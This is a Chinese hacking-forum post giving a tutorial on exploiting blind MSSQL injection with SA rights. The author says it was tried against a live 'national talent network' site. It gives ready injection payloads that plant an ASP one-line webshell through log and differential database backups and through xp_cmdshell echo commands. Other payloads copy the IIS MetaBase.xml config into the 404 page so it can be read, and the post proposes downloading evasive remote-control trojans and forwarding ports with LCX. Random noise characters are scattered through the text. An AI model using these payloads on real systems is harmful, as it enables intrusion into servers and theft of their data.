找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 sa权限的教程.
返回列表 发新帖
查看: 2433|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
; l; J0 s/ _; y. V- }2 y+ m) f0 f6 n+ G# D. ]3 x! w, k6 J9 b' F
& Z2 a2 I0 N5 H
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
5 W0 A8 w2 K% J+ q8 p# o$ R, r6 A+ B) K, ~6 L  F
                                                                 
+ j4 Y( f& ?6 Y5 o" X0 w  l0 e; I                                                                 3 v3 w. c6 Y9 G) D: A  f
                                                                  论坛: http://www.90team.net/
8 L% Y/ n" e1 C* w
4 C/ e, [+ H/ K, ~% q
2 S3 v! _1 x: Q$ P- K5 \8 q. @4 ]- v9 l3 J% |( t
友情检测国家人才网
0 O- d# y! \  W$ T
) \* G6 \8 B4 X+ Q( Z$ l6 W# i( q$ w& T8 C+ [
内容:MSSQL注入SA权限不显错模式下的入侵
" W( j# b) e/ g/ r' m' ?8 e/ H, ^) w/ a0 E% s5 Q( x( C0 a1 f; l

, b) D! F. \2 @' H) |+ F一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。# l3 B! ^1 A8 j+ z
+ ^3 C. \: @$ g) T- E
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
* p. F+ M- m) f) {7 u% c; K' M  ]
6 H7 s" ]4 q$ D' J9 y6 h5 e+ m
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
+ G. B9 a, P0 X6 l5 \0 i. [' u! e( B% a, {
思路:1 ~# N; [+ M) `- m" ?( b+ d

( e) w: Z- b: h1 K2 P! J! ^/ [$ L首先:0 \- m# ]6 [! j8 ]! k

1 B6 Y& v1 g0 R0 s7 ?( P: `2 _% R通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
: a1 h+ b. O& ~6 |: }+ }! b8 Y' `2 w/ _' T
1.日志备份获得Webshell! E5 g* `1 X, s+ z4 K3 u9 D

4 [. F  h- J+ e/ v& D; n2.数据库差异备份获得Webshell
, I9 {0 L( `1 a' t
# D+ n6 I8 w/ Q2 F5 E3 {4.直接下载免杀远控木马。  J! J7 c& f, N9 t  [+ H1 v' U; ^. u

% O. t. K6 @$ t4 ]: ~5.直接下载LCX将服务器端口转发出来
8 j1 }5 p' S0 i& h3 X% U/ t1 }) ~. a8 x% j; i& m
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。: z) D2 O, K! y( N
) ^5 A; k. \$ V* \5 P
+ X2 g5 Q( z3 a) ^8 Q' c) Q5 ?

  E& N7 s0 H! \' B在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 1 r0 s5 o. }9 `

$ z2 A* y, Z: ~* |我直接演示后面一个方法
1 j* h; Y9 ]2 V* H1 i3 @/ m( m) E- F( o2 x
6 ]0 m" c+ |8 O- K5 F; r, z
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
9 N5 {1 M  V8 z3 N; G3 f
+ X% U: w: p0 {; u6 M' i8 k! ~4 }$ M# R
9 N; `  |/ n, S$ o
1 O) Y4 [3 k1 b5 k8 n  B) A( H
◆日志备份:+ r# h7 `+ B5 r( n: Z* s, f7 E; P

  R! z$ U" Q3 ]4 V  Z+ E" W8 ]1 r( x. Y% L2 X5 Y' E! Y" T# k0 K
1. 进行初始备份* Q3 Q6 l  X& t/ F
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--& ~2 X7 I  C1 F- U/ S
8 a4 I* f. t$ r
2. 插入数据
& a0 E. y( k* M; |2 M8 U;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--4 s9 W6 i$ v7 H6 G# H: ^: ~. _
- Q0 m3 P; S) j) Z5 p, W6 l3 I
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>8 X3 N* K  G! r
  
; U8 h+ E& n( ~! @6 X) ]3. 备份并获得文件,删除临时表9 \7 u4 Q7 _1 X5 w& M3 Z" s
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--4 ~) m' @* R, Y/ h

6 M; u* ]+ g  A
/ g1 e8 Y1 u* R& V" E" M  z; B! W- {; [6 J  J6 D7 o5 {
◆数据库差异备份- V5 {5 P3 P8 g' X' s: }3 C1 x
7 K9 ?9 ^6 |2 s7 e: y. w
(1. 进行差异备份准备工作
- x0 G/ J, ^+ }( ]
# K9 E4 w, Z' m2 v;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--7 g. g) Y; w( j, k& \% V4 X

9 ~; D9 J  V; J上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码; l& d- Z$ }, m3 t' J- y
5 n8 D. }7 I; G2 c3 Z
' w7 s( V  L/ {0 k; S! _6 E
(2. 将数据写入到数据库
* i8 P7 n0 ~2 v1 k7 i& X4 X- a;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- # {# N5 T7 d+ y! X8 _$ s
, I" p( B7 q6 K1 i3 T; a8 D
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>! o- Y+ T0 W0 l: q2 c

2 g( |: R0 `, a! m: G3. 备份数据库并清理临时文件
/ k  w' h) u2 K# T2 o( d4 I. i# V: f2 |( @$ [, l
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--/ n1 d) O- W$ |6 o8 l+ \  g

* K2 p: A- v( H( N% q4 h3 ~4 W0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
$ l' q! g$ X- O) [
; n0 j( k5 Q' n- V* A
- V* I! ]4 |8 o1 l+ k+ e* F6 R; [+ D  r
用^转义字符来写ASP(一句话木马)文件的方法:   " K& e! I0 U1 d
/ {% D* T5 M' B( P/ f
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
4 [. N; x  W- d' Z
+ m# D5 m; U  G7 e, ?/ x2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
, b# e" ]( ^  |$ O$ p
2 V; y# |( {6 G/ i读取IIS配置信息获取web路径2 i4 A: s2 j. j) p4 c, }' @

. ]0 Q& Y) i8 E8 d- O/ S7 R     $ `5 c- z. [7 C( b! k
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--6 a$ V1 |) i5 G2 o+ U' H3 r5 f- y

" E% W0 r1 j" Y0 V7 T执行命令
# l  i8 p7 H$ O     
: Z. m: C& T; O$ y; u, A1 a     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
* @1 l4 f$ h/ W- {( j. h2 ~3 n3 }7 o8 `* y( Y8 P) g
% m2 `9 L- u* y; r& a; K
0 E" i, E" j4 E+ s0 H% O. u; j; `+ _
6 g0 t- Q0 W$ c9 D* B) x
0 j6 j+ v" `5 k# T+ {5 ?

9 ?0 R1 X( z- c8 i( n) t
! l) t! _, F* t+ ^. L+ ?: O' F% k* }" I/ L

! N& A0 ?) o8 H2 ~/ W) ^) r2 ^$ i  N; k
* [# ^. R- s' {$ G. P, X
4 v' g; s3 Y7 x0 N) A) l/ K, A% X
* F6 t+ N5 P* M3 }2 @  u6 w. G

+ l) R# C! A% f- j$ t) o8 t6 p: V

& K% M3 y4 A3 b, m8 g
; r4 z5 c$ ~! W
. [! p" J# _( B  a; ]) U+ s' m8 [0 \, F' J5 n. h- Y

9 Z5 |, M4 N( J, l. }- o
- z% o. M) I- W- k( n$ X
% A' f9 l3 i+ a8 p
6 C- k1 s# }# [" ]8 O9 T% w  Q: ~0 y& }" k# o

" z3 X" D/ i8 |4 i: a- |* h# h9 n4 Q0 M1 f3 m( D/ c. D0 C3 h8 g
& b; V. Q" u7 b* s

3 t) @9 S6 \  l$ V5 d: W! J; N: c/ R4 j6 v5 E. w

' o+ d' q7 E8 s% x
* y/ W/ m% z$ z9 S
" H1 ?+ E/ W/ g! D9 s
9 u- K" ]3 G  S# J- s1 ?8 W; L: c. P6 r1 }, E
% q- j& e( Q2 I+ r7 E0 r* }& Z) A

3 F+ G0 m. ~7 ?& ]3 y9 H4 {) e
  a& @, P( k8 |2 I; Z# H1 m' X: Q7 m, X1 ~8 s; E

: M0 T1 V2 {. d) ]5 F" [
" J, K7 q* P. F7 ?, Q  ~- I8 Y% h
3 v2 K; I* m7 i  |; G* m

8 n- j- T1 L; ^& Y" v( \: @- m$ Y$ i3 Z
6 f- B( s! e6 M' g& B
% q# V+ m4 _5 ^0 P8 @; e: _

5 E0 z+ h) s3 p6 e1 g/ @1 w( R3 n
$ ~  C+ g( \. Q4 d( n
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表